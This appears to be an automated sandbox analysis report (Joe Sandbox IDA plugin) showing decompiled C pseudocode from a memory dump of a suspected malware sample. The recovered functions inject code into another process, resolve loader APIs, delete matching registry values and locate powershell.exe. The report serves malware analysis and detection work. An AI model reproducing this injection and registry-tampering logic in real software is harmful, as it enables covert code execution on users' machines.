				void* _v8;
				char _v532;
				void* _v564;
				int _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				signed int _v580;
				char* _v584;
				char* _t44;
				void* _t58;
				void* _t59;
				void* _t60;

				_v568 = 0;
				_v580 = 0;
				_v8 = 0xffffffff;
				_v576 = 0x28c8;
				_v572 = 0x216d;
				while(0 != 0) {
				}
				_v8 = CreateToolhelp32Snapshot(8, GetCurrentProcessId());
				if(_v8 != 0xffffffff) {
					_t49 =  &_v564;
					memset( &_v564, 0, 0x224);
					_t60 = _t59 + 0xc;
					_v564 = 0x224;
					if(Module32First(_v8,  &_v564) != 0) {
						do {
							_v580 = 0;
							while(_v580 < 2) {
								_t44 = E00408060(_t49,  *((intOrPtr*)(_t58 + _v580 * 4 - 0x23c)));
								_t60 = _t60 + 4;
								_v584 = _t44;
								if(_v584 == 0) {
									L14:
									_t49 = _v580 + 1;
									_v580 = _v580 + 1;
									continue;
								} else {
									if(StrStrIA( &_v532, _v584) == 0) {
										E00408170( &_v584);
										_t60 = _t60 + 4;
										goto L14;
									} else {
										while(0 != 0) {
										}
										_v568 = 1;
										E00408170( &_v584);
										_t60 = _t60 + 4;
									}
								}
								break;
							}
							if(_v568 == 0) {
								goto L16;
							}
							break;
							L16:
							_t49 = _v8;
						} while (Module32Next(_v8,  &_v564) != 0);
						CloseHandle(_v8);
						L18:
						while(0 != 0) {
						}
						return _v568;
					}
				}
				goto L18;
			}

0x0040afb9
0x0040afc3
0x0040afcd
0x0040afd4
0x0040afde
0x0040afe8
0x0040afec
0x0040affd
0x0040b004
0x0040b011
0x0040b018
0x0040b01d
0x0040b020
0x0040b03d
0x0040b043
0x0040b043
0x0040b05e
0x0040b075
0x0040b07a
0x0040b07d
0x0040b08a
0x0040b0d4
0x0040b055
0x0040b058
0x00000000
0x0040b08c
0x0040b0a2
0x0040b0cc
0x0040b0d1
0x00000000
0x0040b0a4
0x0040b0a4
0x0040b0a8
0x0040b0aa
0x0040b0bb
0x0040b0c0
0x0040b0c0
0x0040b0a2
0x00000000
0x0040b08a
0x0040b0e0
0x00000000
0x00000000
0x00000000
0x0040b0e2
0x0040b0e9
0x0040b0f3
0x0040b0ff
0x00000000
0x0040b105
0x0040b109
0x0040b114
0x0040b114
0x0040b03d
0x00000000

APIs

GetCurrentProcessId.KERNEL32 ref: 0040AFEE
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0040AFF7
memset.MSVCRT ref: 0040B018
Module32First.KERNEL32(000000FF,00000224), ref: 0040B035
StrStrIA.SHLWAPI(?,00000000), ref: 0040B09A
Module32Next.KERNEL32(000000FF,00000224), ref: 0040B0ED
CloseHandle.KERNEL32(000000FF), ref: 0040B0FF

Strings

m!, xrefs: 0040AFDE

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Module32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32memset
String ID: m!
API String ID: 660242463-3722647371
Opcode ID: 9dec92ff31fae52183643edf837be817561f3999b7f8e72f4d7b7cef630ba519
Instruction ID: f9fa003dd7a99286ce1166cc2253763ff197acd9addb2da2e581f316822219d3
Opcode Fuzzy Hash: 9dec92ff31fae52183643edf837be817561f3999b7f8e72f4d7b7cef630ba519
Instruction Fuzzy Hash: 95315DB0901219DBDB20EF60DD8CBAAB774EB44304F1045EAE519B62C0D77D9B85CF99

Uniqueness

Uniqueness Score: 100.00%

Function 004068D0, Relevance: 13.6, APIs: 4, Strings: 5, Instructions: 61
stringUNIQUE

Download Yara Rule

C-Code - Quality: 37%

			E004068D0(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;

				_t31 = __ecx;
				_v12 = 0;
				_v8 = E00403EE0(__ecx, _a4 + 0x33b);
				if(_v8 != 0) {
					strncpy(_v8 + 0x242, "ntdll.dll", 0xc);
					E00404BD0(_t31, "kernel32.dll", _v8 + 0x228, 0x1a);
					strncpy(_v8 + 0x25a, "LoadLibraryA", 0x20);
					strncpy(_v8 + 0x282, "GetProcAddress", 0x20);
					strncpy(_v8 + 0x2aa, "GetModuleHandleA", 0x20);
					 *((intOrPtr*)(_v8 + 0x24e)) = _a4;
					 *((intOrPtr*)(_v8 + 0x2fb)) = 0xe291a0f3;
					return _v8;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x004068d0
0x004068d6
0x004068ee
0x004068f5
0x00406915
0x0040692d
0x00406946
0x0040695f
0x00406977
0x00406985
0x0040698e
0x00000000
0x00406998
0x004068f7
0x004068fb
0x00000000

APIs

Part of subcall function 00403EE0: RtlAllocateHeap.NTDLL(015D0000,00000008,00415340,?,?,00403F90,00407DD5,?,?,00407DD6,00415340,00000839), ref: 00403EF1

strncpy.MSVCRT ref: 00406915
strncpy.MSVCRT ref: 00406946
strncpy.MSVCRT ref: 0040695F
strncpy.MSVCRT ref: 00406977

Strings

GetProcAddress, xrefs: 00406950
ntdll.dll, xrefs: 00406906
GetModuleHandleA, xrefs: 00406969
LoadLibraryA, xrefs: 00406937
kernel32.dll, xrefs: 00406928

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: strncpy$AllocateHeap
String ID: GetModuleHandleA$GetProcAddress$LoadLibraryA$kernel32.dll$ntdll.dll
API String ID: 383561612-3132565846
Opcode ID: b88ccb46b46f8d56254df84a8bb0c8cda0c936c7c5166aff285e0e94ba72bcaa
Instruction ID: 33bfbe6b7a483abae7a4f31f336b0422e1bacc8c66603348c7d96ef045b1a7c8
Opcode Fuzzy Hash: b88ccb46b46f8d56254df84a8bb0c8cda0c936c7c5166aff285e0e94ba72bcaa
Instruction Fuzzy Hash: 4511B1B1E40308EBDB00EB54DD46B9E7764AF40708F24457AB9057B3C2D5B99F609A49

Uniqueness

Uniqueness Score: 100.00%

Function 0040CA60, Relevance: 12.2, APIs: 8, Instructions: 191
registryCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E0040CA60(void* _a4, short* _a8, WCHAR* _a12) {
				char _v5;
				int _v12;
				int _v16;
				int _v20;
				void* _v24;
				char* _v28;
				int _v32;
				int _v36;
				int* _v40;
				void _v562;
				short _v564;
				int _v568;
				short* _v572;
				long _v576;
				int* _v580;
				struct _FILETIME _v588;
				int _v592;
				int _v596;
				long _v600;
				short _t61;
				short* _t63;
				char* _t64;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;

				_v580 = 0;
				_v24 = 0;
				_t61 =  *0x415240; // 0x0
				_v564 = _t61;
				_t93 =  &_v562;
				memset( &_v562, 0, 0x206);
				_t124 = _t123 + 0xc;
				_v32 = 0x104;
				_v40 = 0;
				_v568 = 0x3fff;
				_v12 = 0;
				_v5 = 0;
				while(0 != 0) {
				}
				_t63 = E00403EE0(_t93, 0x3fff);
				_t125 = _t124 + 4;
				_v572 = _t63;
				if(_v572 != 0) {
					_t64 = E00403EE0(_t93, 0x800);
					_t126 = _t125 + 4;
					_v28 = _t64;
					if(_v28 != 0) {
						_v576 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v24);
						if(_v576 == 0) {
							while(0 != 0) {
							}
							_v576 = RegQueryInfoKeyW(_v24,  &_v564,  &_v32, 0, 0, 0, 0,  &_v596,  &_v592,  &_v36,  &_v16,  &_v588);
							if(_v576 == 0) {
								if(_v596 == 0) {
									L37:
									while(0 != 0) {
									}
									L39:
									if(_v24 != 0) {
										RegCloseKey(_v24);
									}
									E00403F10( &_v572, 0x3fff);
									E00403F10( &_v28, 0x800);
									while(0 != 0) {
									}
									return _v580;
								}
								_v20 = 0;
								_v576 = 0;
								while(_v20 < _v596) {
									E00404120(_v28, _v28, 0, 0x800);
									E00404120(_v28, _v572, 0, 0x3fff);
									_t126 = _t126 + 0x18;
									_v568 = 0x3fff;
									_v12 = 0x800;
									 *_v572 = 0;
									_v576 = RegEnumValueW(_v24, _v20, _v572,  &_v568, 0, 0, _v28,  &_v12);
									if(_v576 != 0) {
										while(0 != 0) {
										}
										L23:
										_v20 = _v20 + 1;
										continue;
									}
									if(StrStrIW(_v28, _a12) == 0) {
										L32:
										goto L23;
									}
									while(0 != 0) {
									}
									_v600 = RegDeleteValueW(_v24, _v572);
									if(_v600 == 0) {
										goto L32;
									}
									while(0 != 0) {
									}
									goto L32;
								}
								goto L37;
							}
							while(0 != 0) {
							}
							RegCloseKey(_v24);
							goto L39;
						}
						while(0 != 0) {
						}
						goto L39;
					}
					while(0 != 0) {
					}
					return 0;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x0040ca69
0x0040ca73
0x0040ca7a
0x0040ca80
0x0040ca8e
0x0040ca95
0x0040ca9a
0x0040ca9d
0x0040caa4
0x0040caab
0x0040cab5
0x0040cabc
0x0040cac0
0x0040cac4
0x0040cacb
0x0040cad0
0x0040cad3
0x0040cae0
0x0040caf4
0x0040caf9
0x0040cafc
0x0040cb03
0x0040cb2b
0x0040cb38
0x0040cb45
0x0040cb49
0x0040cb85
0x0040cb92
0x0040cbb0
0x00000000
0x0040ccad
0x0040ccb1
0x0040ccb3
0x0040ccb7
0x0040ccbd
0x0040ccbd
0x0040cccf
0x0040cce0
0x0040cce8
0x0040ccec
0x00000000
0x0040ccee
0x0040cbb6
0x0040cbbd
0x0040cbd2
0x0040cbec
0x0040cc02
0x0040cc07
0x0040cc0a
0x0040cc14
0x0040cc23
0x0040cc4e
0x0040cc5b
0x0040cc9d
0x0040cca1
0x0040cbc9
0x0040cbcf
0x00000000
0x0040cbcf
0x0040cc6d
0x0040cc9b
0x00000000
0x0040cca8
0x0040cc6f
0x0040cc73
0x0040cc86
0x0040cc93
0x00000000
0x00000000
0x0040cc95
0x0040cc99
0x00000000
0x0040cc95
0x00000000
0x0040cbd2
0x0040cb94
0x0040cb98
0x0040cb9e
0x00000000
0x0040cb9e
0x0040cb3a
0x0040cb3e
0x00000000
0x0040cb40
0x0040cb05
0x0040cb09
0x00000000
0x0040cb0b
0x0040cae2
0x0040cae6
0x00000000

APIs

memset.MSVCRT ref: 0040CA95

Part of subcall function 00403EE0: RtlAllocateHeap.NTDLL(015D0000,00000008,00415340,?,?,00403F90,00407DD5,?,?,00407DD6,00415340,00000839), ref: 00403EF1

RegOpenKeyExW.ADVAPI32(00000000,80000001,00000000,00020019,00000000), ref: 0040CB25
RegQueryInfoKeyW.ADVAPI32(00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,?,80000001,?), ref: 0040CB7F
RegCloseKey.ADVAPI32(00000000), ref: 0040CB9E
RegEnumValueW.ADVAPI32(00000000,00000000,00000000,00003FFF,00000000,00000000,00000000,00000800), ref: 0040CC48
StrStrIW.SHLWAPI(00000000,00000000), ref: 0040CC65
RegDeleteValueW.ADVAPI32(00000000,00000000), ref: 0040CC80
RegCloseKey.ADVAPI32(00000000), ref: 0040CCBD

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CloseValue$AllocateDeleteEnumHeapInfoOpenQuerymemset
String ID:
API String ID: 1688699966-0
Opcode ID: 89f43128eb1515e0fac67437c933f42cc1844fa7a0f2f67ff32a84bba72601ba
Instruction ID: b8bbf6f8a8cd1d02f980589755a49b3c2e806db30b600d1180b121236096c6cd
Opcode Fuzzy Hash: 89f43128eb1515e0fac67437c933f42cc1844fa7a0f2f67ff32a84bba72601ba
Instruction Fuzzy Hash: 13716F71904219DBEB24DB90DCC9BEFB774AB44304F1046BAA50AB62C0D77C5A85CF59

Uniqueness

Uniqueness Score: 6.12%

Function 00406460, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 359
stringUNIQUE

Download Yara Rule

C-Code - Quality: 70%

			E00406460(void* __fp0, intOrPtr _a4, void* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24, intOrPtr _a28, long _a32) {
				long _v8;
				WCHAR* _v12;
				long _v16;
				void* _v20;
				long _v24;
				void* _v28;
				long _v32;
				long _v36;
				void* _v40;
				long _v44;
				long _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				intOrPtr _t197;
				WCHAR* _t198;
				long _t208;
				void* _t210;
				void* _t213;
				void* _t215;
				intOrPtr _t235;
				intOrPtr _t239;
				intOrPtr _t243;
				intOrPtr _t247;
				intOrPtr _t251;
				WCHAR* _t276;
				WCHAR* _t279;
				WCHAR* _t284;
				WCHAR* _t289;
				WCHAR* _t294;
				WCHAR* _t299;
				long _t309;
				void* _t321;
				void* _t327;
				void* _t333;
				void* _t339;
				void* _t345;
				void* _t355;
				void* _t356;
				void* _t357;
				void* _t358;
				void* _t359;
				void* _t366;

				_t366 = __fp0;
				_v44 = 0;
				_v24 = 0;
				_v8 = 0;
				_v48 = 0;
				_v20 = 0;
				_v28 = 0;
				_v40 = 0;
				_v16 = 0;
				_v12 = 0;
				_v36 = 0;
				_v32 = 0;
				if(_a28 != 0) {
					if(_a4 != 1) {
						_v8 =  *((intOrPtr*)( *((intOrPtr*)(_a12 + 0x38)) +  *((intOrPtr*)( *((intOrPtr*)(_a12 + 0x38)) + 0x3c)) + 0x50));
						_t197 = _a12;
						_t262 =  *((intOrPtr*)(_t197 + 0x38));
						_v48 =  *((intOrPtr*)(_t197 + 0x38));
					} else {
						_v8 =  *((intOrPtr*)( *((intOrPtr*)(_a12 + 0x3c)) +  *((intOrPtr*)( *((intOrPtr*)(_a12 + 0x3c)) + 0x3c)) + 0x50));
						_t262 = _a12;
						_v48 =  *((intOrPtr*)(_a12 + 0x3c));
					}
					_t198 = E004068D0(_t262, _v8);
					_t356 = _t355 + 4;
					_v12 = _t198;
					if(_v12 == 0) {
						return 0;
					}
					lstrcpynW(_v12, "C:\Users\Luke\Desktop\zhAQkCQvME.exe", 0x104);
					if(_a24 != 0) {
						E00403BF0(_a24,  &(_v12[0x104]), _a24, 0x20);
						_t356 = _t356 + 0xc;
					}
					if( *((intOrPtr*)(_a12 + 0x10)) != 0) {
						_t345 = _a8;
						_t251 = E00404540(_t345,  *((intOrPtr*)(_a12 + 0x10)),  *(_a12 + 0x14));
						_t356 = _t356 + 0xc;
						asm("cdq");
						_t299 = _v12;
						 *((intOrPtr*)(_t299 + 0x2ff)) = _t251;
						 *((intOrPtr*)(_t299 + 0x303)) = _t345;
						_v52 = _v12;
						if(( *(_v52 + 0x2ff) |  *(_v52 + 0x303)) != 0) {
							_v12[0x183] =  *(_a12 + 0x14);
						}
					}
					if( *((intOrPtr*)(_a12 + 0x18)) != 0) {
						_t339 = _a8;
						_t247 = E00404540(_t339,  *((intOrPtr*)(_a12 + 0x18)),  *(_a12 + 0x1c));
						_t356 = _t356 + 0xc;
						asm("cdq");
						_t294 = _v12;
						 *((intOrPtr*)(_t294 + 0x30b)) = _t247;
						 *((intOrPtr*)(_t294 + 0x30f)) = _t339;
						_v56 = _v12;
						if(( *(_v56 + 0x30b) |  *(_v56 + 0x30f)) != 0) {
							_v12[0x189] =  *(_a12 + 0x1c);
						}
					}
					if( *((intOrPtr*)(_a12 + 0x20)) != 0) {
						_t333 = _a8;
						_t243 = E00404540(_t333,  *((intOrPtr*)(_a12 + 0x20)),  *(_a12 + 0x24));
						_t356 = _t356 + 0xc;
						asm("cdq");
						_t289 = _v12;
						 *((intOrPtr*)(_t289 + 0x317)) = _t243;
						 *((intOrPtr*)(_t289 + 0x31b)) = _t333;
						_v60 = _v12;
						if(( *(_v60 + 0x317) |  *(_v60 + 0x31b)) != 0) {
							_v12[0x18f] =  *(_a12 + 0x24);
						}
					}
					if( *((intOrPtr*)(_a12 + 0x28)) != 0) {
						_t327 = _a8;
						_t239 = E00404540(_t327,  *((intOrPtr*)(_a12 + 0x28)),  *(_a12 + 0x2c));
						_t356 = _t356 + 0xc;
						asm("cdq");
						_t284 = _v12;
						 *((intOrPtr*)(_t284 + 0x323)) = _t239;
						 *((intOrPtr*)(_t284 + 0x327)) = _t327;
						_v64 = _v12;
						if(( *(_v64 + 0x323) |  *(_v64 + 0x327)) != 0) {
							_v12[0x195] =  *(_a12 + 0x2c);
						}
					}
					if( *((intOrPtr*)(_a12 + 0x30)) != 0) {
						_t321 = _a8;
						_t235 = E00404540(_t321,  *((intOrPtr*)(_a12 + 0x30)),  *(_a12 + 0x34));
						_t356 = _t356 + 0xc;
						asm("cdq");
						_t279 = _v12;
						 *((intOrPtr*)(_t279 + 0x32f)) = _t235;
						 *((intOrPtr*)(_t279 + 0x333)) = _t321;
						_v68 = _v12;
						if(( *(_v68 + 0x32f) |  *(_v68 + 0x333)) != 0) {
							_v12[0x19b] =  *(_a12 + 0x34);
						}
					}
					while(0 != 0) {
					}
					while(0 != 0) {
					}
					_t208 = E004063B0(_t366, _v48, _v12, 0x33b);
					_t357 = _t356 + 0xc;
					_v16 = _t208;
					if(_v16 != 0) {
						_t309 = _v16;
						_t210 = E00404540(_a8, _t309, _v8);
						_t358 = _t357 + 0xc;
						_v20 = _t210;
						if(_v20 != 0) {
							if(_a4 != 1) {
								_v12[0x129] = _v20;
							} else {
								asm("cdq");
								_t276 = _v12;
								 *((intOrPtr*)(_t276 + 0x252)) = _v20;
								 *(_t276 + 0x256) = _t309;
							}
							_t213 = E00404540(_a8, _v12, _v8 + 0x33b);
							_t359 = _t358 + 0xc;
							_v40 = _t213;
							if(_v40 != 0) {
								_t215 = E00404540(_a8, _a28, _a32);
								_t359 = _t359 + 0xc;
								_v28 = _t215;
								if(_v28 != 0) {
									if(VirtualProtectEx(_a8, _v28, _a32, 0x20,  &_v32) != 0) {
										while(0 != 0) {
										}
										if(_a16 != 0) {
											 *_a16 = _v28;
										}
										if(_a20 != 0) {
											 *_a20 = _v40;
										}
										E00403F10( &_v16, _v8);
										E00403F10( &_v12, 0x33b);
										return _v20;
									}
									while(0 != 0) {
									}
									goto L52;
								}
								goto L52;
							} else {
								L52:
								while(0 != 0) {
								}
								E00403F10( &_v12, 4);
								E00403F10( &_v16, 0);
								if(_v20 != 0) {
									VirtualFreeEx(_a8, _v20, 0, 0x8000);
								}
								if(_v28 != 0) {
									VirtualFreeEx(_a8, _v28, 0, 0x8000);
								}
								if(_v40 != 0) {
									VirtualFreeEx(_a8, _v40, 0, 0x8000);
								}
								return 0;
							}
						}
						goto L52;
					}
					goto L52;
				}
				L1:
				if(0 == 0) {
					return 0;
				} else {
				}
				goto L1;
			}

0x00406460
0x00406466
0x0040646d
0x00406474
0x0040647b
0x00406482
0x00406489
0x00406490
0x00406497
0x0040649e
0x004064a5
0x004064ac
0x004064b7
0x004064ca
0x00406500
0x00406503
0x00406506
0x00406509
0x004064cc
0x004064df
0x004064e2
0x004064e8
0x004064e8
0x00406510
0x00406515
0x00406518
0x0040651f
0x00000000
0x00406521
0x00406536
0x00406540
0x00406552
0x00406557
0x00406557
0x00406561
0x00406571
0x00406575
0x0040657a
0x0040657d
0x0040657e
0x00406581
0x00406587
0x00406590
0x004065a5
0x004065b0
0x004065b0
0x004065a5
0x004065bd
0x004065cd
0x004065d1
0x004065d6
0x004065d9
0x004065da
0x004065dd
0x004065e3
0x004065ec
0x00406601
0x0040660c
0x0040660c
0x00406601
0x00406619
0x00406629
0x0040662d
0x00406632
0x00406635
0x00406636
0x00406639
0x0040663f
0x00406648
0x0040665d
0x00406668
0x00406668
0x0040665d
0x00406675
0x00406685
0x00406689
0x0040668e
0x00406691
0x00406692
0x00406695
0x0040669b
0x004066a4
0x004066b9
0x004066c4
0x004066c4
0x004066b9
0x004066d1
0x004066e1
0x004066e5
0x004066ea
0x004066ed
0x004066ee
0x004066f1
0x004066f7
0x00406700
0x00406715
0x00406720
0x00406720
0x00406715
0x00406726
0x0040672a
0x0040672c
0x00406730
0x0040673f
0x00406744
0x00406747
0x0040674e
0x00406759
0x00406761
0x00406766
0x00406769
0x00406770
0x0040677b
0x00406798
0x0040677d
0x00406780
0x00406781
0x00406784
0x0040678a
0x0040678a
0x004067b0
0x004067b5
0x004067b8
0x004067bf
0x004067d2
0x004067d7
0x004067da
0x004067e1
0x004067ff
0x00406809
0x0040680d
0x00406813
0x0040681b
0x0040681b
0x00406821
0x00406829
0x00406829
0x00406833
0x00406844
0x00000000
0x0040684c
0x00406801
0x00406805
0x00000000
0x00406807
0x00000000
0x004067c1
0x00000000
0x00406851
0x00406855
0x0040685d
0x0040686b
0x00406877
0x00406888
0x00406888
0x00406892
0x004068a3
0x004068a3
0x004068ad
0x004068be
0x004068be
0x00000000
0x004068c4
0x004067bf
0x00000000
0x00406772
0x00000000
0x00406750
0x004064b9
0x004064bb
0x00000000
0x00000000
0x004064bd
0x00000000

APIs

lstrcpynW.KERNEL32(00000000,C:\Users\user\Desktop\zhAQkCQvME.exe,00000104), ref: 00406536
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 00406888
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 004068A3
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 004068BE

Part of subcall function 00404540: VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00001000,00000040), ref: 0040455E

Strings

C:\Users\user\Desktop\zhAQkCQvME.exe, xrefs: 0040652D

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Virtual$Free$Alloclstrcpyn
String ID: C:\Users\user\Desktop\zhAQkCQvME.exe
API String ID: 3146719540-286999786
Opcode ID: 74d01a66a0b575ed06a6413711fdada417f684864a4d4f292e9af0e726c2e1e5
Instruction ID: c387782c279ac59f72686ea76f6ed830028e843ba375bf184c3331c419b7896a
Opcode Fuzzy Hash: 74d01a66a0b575ed06a6413711fdada417f684864a4d4f292e9af0e726c2e1e5
Instruction Fuzzy Hash: DBF14CB5A00209EFCB04DF94D894FAEB7B5BF88304F208579E9066B391D735EA52CB54

Uniqueness

Uniqueness Score: 100.00%

Function 0040C710, Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 208
stringUNIQUE

Download Yara Rule

C-Code - Quality: 65%

			E0040C710(void* __ecx, intOrPtr _a4, signed int _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				char _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				int _v72;
				signed int _t73;
				signed int _t75;
				signed int _t89;
				signed int _t96;
				signed int _t97;
				signed int _t101;
				signed int _t106;
				void* _t109;
				signed int _t110;
				WCHAR* _t119;
				signed int _t128;
				signed int _t131;
				signed int _t134;
				void* _t137;
				void* _t138;
				void* _t140;

				_t109 = __ecx;
				_v12 = 0;
				_v8 = 0;
				while(0 != 0) {
				}
				_t73 = E00403EE0(_t109, 0x412);
				_t138 = _t137 + 4;
				_v12 = _t73;
				__eflags = _v12;
				if(_v12 != 0) {
					_t110 =  *0x421408; // 0x0
					__eflags = _t110 & 0x00000200;
					if(__eflags != 0) {
						L9:
						_v16 = 0;
						_v52 = 0;
						_t112 =  &_v48;
						E004048B0(__eflags,  &_v48, 7, 0xf, 0x4201bc);
						_t75 = E00405250(L"PATH");
						_t140 = _t138 + 0x14;
						_v16 = _t75;
						__eflags = _v16;
						if(_v16 == 0) {
							L30:
							__eflags = _v52;
							if(_v52 == 0) {
								while(1) {
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								__eflags = _a8;
								if(_a8 == 0) {
									_v8 = E00407F40(0, 0x27ee);
								} else {
									_v8 = E00407F40(0, 0x1cd4);
								}
								_push(_a4);
								E00403B30(_v12, 0x208, _v8, "C:\Windows");
								L41:
								E00408170( &_v8);
								while(1) {
									L45:
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								return _v12;
							}
							__eflags = _a8;
							if(_a8 == 0) {
								_v8 = E00407F40(_t112, 0x1912);
							} else {
								_v8 = E00407F40(_t112, 0x2ad6);
							}
							_push(_a4);
							E00403B30(_v12, 0x208, _v8, _v52);
							E00403F10( &_v52, 0xfffffffe);
							goto L41;
						}
						_v60 = 0;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_t112 = _v16;
						_t89 = E00404FD0(_v16, 0x3b, 0,  &_v56);
						_t140 = _t140 + 0x10;
						_v60 = _t89;
						__eflags = _v60;
						if(_v60 == 0) {
							goto L30;
						}
						_v64 = 0;
						_v64 = 0;
						while(1) {
							__eflags = _v64 - _v56;
							if(_v64 >= _v56) {
								goto L30;
							}
							_v68 = 0;
							_v72 = lstrlenW( *(_v60 + _v64 * 4));
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_t119 =  *(_v60 + _v64 * 4);
							_t128 = _v72;
							__eflags = ( *(_t119 + _t128 * 2 - 2) & 0x0000ffff) - 0x5c;
							if(( *(_t119 + _t128 * 2 - 2) & 0x0000ffff) != 0x5c) {
								_push(0);
								_push(L"powershell.exe");
								_push(0x4187f0);
								_t112 = _v64;
								_t96 = E00404CB0( *(_v60 + _v64 * 4));
								_t140 = _t140 + 0x10;
								_v68 = _t96;
							} else {
								_push(0);
								_push(L"powershell.exe");
								_t112 = _v64;
								_t101 = E00404CB0( *(_v60 + _v64 * 4));
								_t140 = _t140 + 0xc;
								_v68 = _t101;
							}
							__eflags = _v68;
							if(_v68 == 0) {
								L29:
								_t131 = _v64 + 1;
								__eflags = _t131;
								_v64 = _t131;
								continue;
							} else {
								_t112 = _v68;
								_t97 = E0040E080(_v68, _v68);
								_t140 = _t140 + 4;
								__eflags = _t97;
								if(_t97 == 0) {
									_t112 =  &_v68;
									E00403F10( &_v68, 0xfffffffe);
									_t140 = _t140 + 8;
									goto L29;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								_v52 = _v68;
								goto L30;
							}
						}
						goto L30;
					}
					_t134 =  *0x421408; // 0x0
					__eflags = _t134 & 0x00004000;
					if(__eflags != 0) {
						goto L9;
					}
					__eflags =  *0x41f764 - 0xa;
					if( *0x41f764 < 0xa) {
						L42:
						__eflags = _a8;
						if(_a8 == 0) {
							E00403B30(_v12, 0x208, L"\"%s\"", _a4);
						} else {
							E00403B30(_v12, 0x208, L"\\\"%s\\\"", _a4);
						}
						goto L45;
					}
					_t106 =  *0x421408; // 0x0
					__eflags = _t106 & 0x00000004;
					if(__eflags == 0) {
						goto L42;
					}
					goto L9;
				}
				return 0;
			}

0x0040c710
0x0040c716
0x0040c71d
0x0040c724
0x0040c728
0x0040c72f
0x0040c734
0x0040c737
0x0040c73a
0x0040c73e
0x0040c747
0x0040c74d
0x0040c753
0x0040c77e
0x0040c77e
0x0040c785
0x0040c795
0x0040c799
0x0040c7a6
0x0040c7ab
0x0040c7ae
0x0040c7b1
0x0040c7b5
0x0040c8ba
0x0040c8ba
0x0040c8be
0x0040c915
0x0040c915
0x0040c917
0x00000000
0x00000000
0x0040c919
0x0040c91b
0x0040c91f
0x0040c940
0x0040c921
0x0040c92e
0x0040c92e
0x0040c946
0x0040c959
0x0040c961
0x0040c965
0x0040c9ab
0x0040c9ab
0x0040c9ab
0x0040c9ad
0x00000000
0x00000000
0x0040c9af
0x00000000
0x0040c9b1
0x0040c8c0
0x0040c8c4
0x0040c8e5
0x0040c8c6
0x0040c8d3
0x0040c8d3
0x0040c8eb
0x0040c8fd
0x0040c90b
0x00000000
0x0040c910
0x0040c7bb
0x0040c7c2
0x0040c7c2
0x0040c7c4
0x00000000
0x00000000
0x0040c7c6
0x0040c7d0
0x0040c7d4
0x0040c7d9
0x0040c7dc
0x0040c7df
0x0040c7e3
0x00000000
0x00000000
0x0040c7e9
0x0040c7f0
0x0040c802
0x0040c805
0x0040c808
0x00000000
0x00000000
0x0040c80e
0x0040c825
0x0040c828
0x0040c828
0x0040c82a
0x00000000
0x00000000
0x0040c82c
0x0040c834
0x0040c837
0x0040c83f
0x0040c842
0x0040c862
0x0040c864
0x0040c869
0x0040c86e
0x0040c878
0x0040c87d
0x0040c880
0x0040c844
0x0040c844
0x0040c846
0x0040c84b
0x0040c855
0x0040c85a
0x0040c85d
0x0040c85d
0x0040c883
0x0040c887
